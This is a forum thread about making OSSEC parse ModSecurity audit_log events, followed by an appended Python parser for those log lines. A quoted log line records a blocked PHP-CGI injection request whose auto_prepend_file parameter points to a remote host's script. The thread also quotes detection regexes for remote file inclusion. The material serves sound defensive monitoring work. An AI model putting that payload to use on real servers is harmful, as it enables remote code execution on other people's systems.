Ossec Log Format for audit_log?

Posted: Wed Sep 18, 2013 10:56 am
by webwzrd
I've searched and searched but can't seem to find the correct log format to use for monitoring audit_log with Ossec.

<localfile>
<log_format>apache</log_format>
<location>/var/log/httpd/audit_log</location>
</localfile>

I've tried apache and syslog, but they only fire off Rule: 1002 and not the ModSecurity rules. What do I need for this to work?

Re: Ossec Log Format for audit_log?

Posted: Wed Sep 18, 2013 11:26 am
by scott
Make sure you use the mod_security from the atomic or asl channel, it writes the logs in the correct format.

Re: Ossec Log Format for audit_log?

Posted: Wed Sep 18, 2013 11:28 am
by webwzrd
scott wrote: Make sure you use the mod_security from the atomic or asl channel, it writes the logs in the correct format.
Thanks, I am.

Re: Ossec Log Format for audit_log?

Posted: Thu Sep 19, 2013 10:54 am
by webwzrd
Is "apache" the correct log format?

This is what I get reported in Ossec notifications:

OSSEC HIDS Notification.
2013 Sep 19 09:07:53

Received From: (server.hidden.com) 11.11.11.111->/var/log/httpd/audit_log
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

[modsecurity] [client 173.54.19.213] [domain private.com] [403] [/20130919/20130919-0907/20130919-090751-UjsFN0E8MfIAAD2WOhQAAAAh] [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "508"] [id "340165"] [rev "279"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Uniencoded possible Remote File Injection attempt in URI (AE)"] [data "/index.php?-dsafe_mode=off -ddisable_functions=null -dallow_url_fopen=on -dallow_url_include=on -dauto_prepend_file=http://61.19.253.26/echo.txt"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Pattern match "=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)://" at REQUEST_URI.



--END OF NOTIFICATION



OSSEC HIDS Notification.
2013 Sep 19 09:08:01

Received From: (server.hidden.com) 11.11.11.111->/var/log/httpd/audit_log
Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."
Portion of the log(s):

[modsecurity] [client 117.26.202.193] [domain private.com] [403] [/20130919/20130919-0908/20130919-090800-UjsFQEE8MfIAAD2LMXQAAAAc] [file "/etc/httpd/modsecurity.d/20_asl_useragents.conf"] [line "265"] [id "309925"] [rev "4"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Suspicious User-Agent, parenthesis closed with a semicolon Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)"] Access denied with code 403 (phase 2). Match of "rx (Qualidator\\.com|ExaleadCloudView|^Mozilla/4\\.0 \\(compatible;\\)$|UTVDriveBot)" against "REQUEST_HEADERS:User-Agent" required.



--END OF NOTIFICATION

Re: Ossec Log Format for audit_log?

Posted: Fri Sep 20, 2013 1:34 pm
by mikeshinn
Yes, "apache" is correct. This error:

Rule: 1002 fired (level 2) -> "Unknown problem somewhere in the system."

Means your ossec rules don't have rules to parse or understand the modsecurity log events, so you'll also have to create ossec rules to detect and parse them (pull out IP addresses, etc.).

Or you can use ASL. ASL includes our custom ossec rules for each of our modsecurity rules, giving you both fine grained control over how each modsecurity rule is treated by ossec, and the ability for ossec to do deep event, attack type and vulnerability type correlation of the modsecurity events with other events on the system.

Re: Ossec Log Format for audit_log?

Posted: Fri Sep 20, 2013 2:17 pm
by webwzrd
Here are the mod_security rules included in my apache_rules.xml:

<!-- Mod security rules by <ossec ( at ) sioban.net -->
<rule id="30118" level="6">
<if_sid>30101</if_sid>
<match>mod_security: Access denied|ModSecurity: Access denied</match>
<description>Access attempt blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>

<rule id="30119" level="12" frequency="6" timeframe="120">
<if_matched_sid>30118</if_matched_sid>
<same_source_ip />
<description>Multiple attempts blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>

<rule id="30120" level="12">
<if_sid>30101</if_sid>
<match>Resource temporarily unavailable:</match>
<description>Apache without resources to run.</description>
<group>service_availability,</group>
</rule>

<rule id="30200" level="6" noalert="1">
<match>^mod_security-message: </match>
<description>Modsecurity alert.</description>
</rule>

<rule id="30201" level="6">
<if_sid>30200</if_sid>
<match>^mod_security-message: Access denied </match>
<description>Modsecurity access denied.</description>
<group>access_denied,</group>
</rule>

<rule id="30202" level="10" frequency="8" timeframe="120">
<if_matched_sid>30201</if_matched_sid>
<description>Multiple attempts blocked by Mod Security.</description>
<group>access_denied,</group>
</rule>

Re: Ossec Log Format for audit_log?

Posted: Fri Sep 20, 2013 2:41 pm
by webwzrd
After reviewing the rules I just posted, the match phrases seem to be incorrect for the way audit_log has things worded.

Do I have the wrong Ossec rules or the wrong audit_log format?

Re: Ossec Log Format for audit_log?

Posted: Fri Sep 20, 2013 7:06 pm
by mikeshinn
Wrong or old ossec rules.

Re: Ossec Log Format for audit_log?

Posted: Fri Sep 20, 2013 8:11 pm
by webwzrd
I have the latest Ossec 2.7 with rules installed from ossec.net. They do list getting it directly from the AtomiCorp repository, however my monitoring server is an AWS and not compatible with "RPMs for RHEL, CentOS, Fedora and others". I used Server 2.7 – Linux/BSD download instead.

http://www.ossec.net/?page_id=19

Would that make a difference?

Re: Ossec Log Format for audit_log?

Posted: Sat Sep 21, 2013 9:20 pm
by mikeshinn
It certainly could. The other problem you're going to have with the ossec rules you posted is that they don't recognize modsecurity levels, and will treat all modsecurity events the same, which means you'll also end up blocking lower level rules (suspicious or just informational rules, as opposed to actual attacks).
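To make mikeshinn's two points concrete (the stock rules match on "mod_security: Access denied" rather than on the bracketed audit_log layout shown above, and they ignore the per-rule severity), here is an added example, not code from the thread or from OSSEC/ASL, that decodes the "[modsecurity] [client ...] ... [severity ...]" lines into the fields an OSSEC decoder would extract and derives an alert level from the logged severity instead of a flat level. The sample lines are constructed here, abbreviated from the two events quoted in the thread, and the severity-to-level mapping is an assumption to adjust to your own policy.

```python
import re

# Sample audit_log events, abbreviated from the two lines quoted in the
# thread above (constructed for this example; same field layout).
SAMPLE_LINES = [
    '[modsecurity] [client 173.54.19.213] [domain private.com] [403] '
    '[/20130919/20130919-0907/20130919-090751-UjsFN0E8MfIAAD2WOhQAAAAh] '
    '[id "340165"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: '
    'Uniencoded possible Remote File Injection attempt in URI (AE)"] '
    '[severity "CRITICAL"] '
    'Access denied with code 403 (phase 2).',
    '[modsecurity] [client 117.26.202.193] [domain private.com] [403] '
    '[/20130919/20130919-0908/20130919-090800-UjsFQEE8MfIAAD2LMXQAAAAc] '
    '[id "309925"] [msg "Suspicious User-Agent, parenthesis closed with '
    'a semicolon"] Access denied with code 403 (phase 2).',
]

# One bracketed field: optional "key ", then a quoted or a bare value.
FIELD_RE = re.compile(r'\[(?:(\w+) )?(?:"([^"]*)"|([^\]]*))\]\s*')

# Assumed mapping of ModSecurity severities onto OSSEC-style levels.
SEVERITY_LEVELS = {"EMERGENCY": 12, "ALERT": 12, "CRITICAL": 10, "ERROR": 8,
                   "WARNING": 6, "NOTICE": 4, "INFO": 3, "DEBUG": 2}

def parse_audit_line(line):
    """Decode one '[modsecurity] ...' event into the fields OSSEC would need."""
    if not line.startswith("[modsecurity]"):
        return None                     # not a ModSecurity audit event
    fields, positional, pos = {}, [], 0
    for m in FIELD_RE.finditer(line):
        if m.start() != pos:
            break                       # bracket prefix ended; rest is free text
        pos = m.end()
        key, quoted, bare = m.groups()
        value = quoted if quoted is not None else bare
        if key:
            fields[key] = value
        else:
            positional.append(value)    # "modsecurity", HTTP status, audit entry path
    status = positional[1] if len(positional) > 1 else ""
    return {"srcip": fields.get("client"), "domain": fields.get("domain"),
            "status": int(status) if status.isdigit() else None,
            "rule_id": fields.get("id"), "msg": fields.get("msg"),
            "severity": fields.get("severity"), "action": line[pos:].strip()}

def alert_level(event):
    """Level from the logged severity, so INFO hits are not scored like CRITICAL ones."""
    sev = (event.get("severity") or "").upper()
    return SEVERITY_LEVELS.get(sev, 5)  # 5 is an assumed default when no severity is logged
```

Feeding `SAMPLE_LINES` through `parse_audit_line` gives the client IP, rule id and severity per event; the second event carries no severity field and falls back to the default level, which is exactly the case a one-size-fits-all "Access denied" rule would over-score.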